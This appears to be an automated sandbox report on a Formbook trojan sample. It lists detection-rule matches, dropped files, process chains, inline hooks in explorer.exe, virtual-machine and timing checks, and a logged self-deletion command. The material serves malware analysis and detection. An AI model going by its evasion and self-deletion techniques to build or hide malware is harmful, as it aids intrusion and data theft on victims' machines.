Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F35778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EF8B30 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EE1A36 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EF0D17 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EF9FA5 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EE1CB6 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00F01B70 appears 39 times

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A360 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A410 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A490 NtClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A35B NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A40A NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A48B NtClose,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F342D5: CreateFileW,DeviceIoControl,CloseHandle,

Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs shedfam.exe

Source: shedfam.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/5@3/2

Source: C:\Users\user\Desktop\shedfam.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F3A6AD GetLastError,FormatMessageW,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

Source: C:\Users\user\Desktop\shedfam.exe

File read: C:\Users\user\Desktop\shedfam.exe

Jump to behavior

Source: C:\Users\user\Desktop\shedfam.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\shedfam.exe C:\Users\user\Desktop\shedfam.exe
Source: C:\Users\user\Desktop\shedfam.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\shedfam.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"

Source: C:\Users\user\Desktop\shedfam.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F28DE9 AdjustTokenPrivileges,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F29399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,

Source: C:\Users\user\Desktop\shedfam.exe

File created: C:\Users\user\AppData\Local\Temp\nse13E8.tmp

Jump to behavior

Source: C:\Users\user\Desktop\shedfam.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\shedfam.exe

Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF8B75 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041693E push ebp; ret
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0040D308 push FFFFFF90h; iretd
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D4B5 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D56C push eax; ret
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D502 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D50B push eax; ret
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EF8B75 push ecx; ret

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\shedfam.exe

File created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE7

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\shedfam.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000002F19904 second address: 0000000002F1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000002F19B7E second address: 0000000002F19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Source: C:\Windows\explorer.exe TID: 6016	Thread sleep time: -32000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5356	Thread sleep time: -32000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	API coverage: 1.4 %

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 2_2_00409AB0 rdtsc

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\shedfam.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	API call chain: ExitProcess graph end node

Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000003.00000000.266277554.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.261007312.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00402654 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3CD14 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress,

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF0149 mov eax, dword ptr fs:[00000030h]
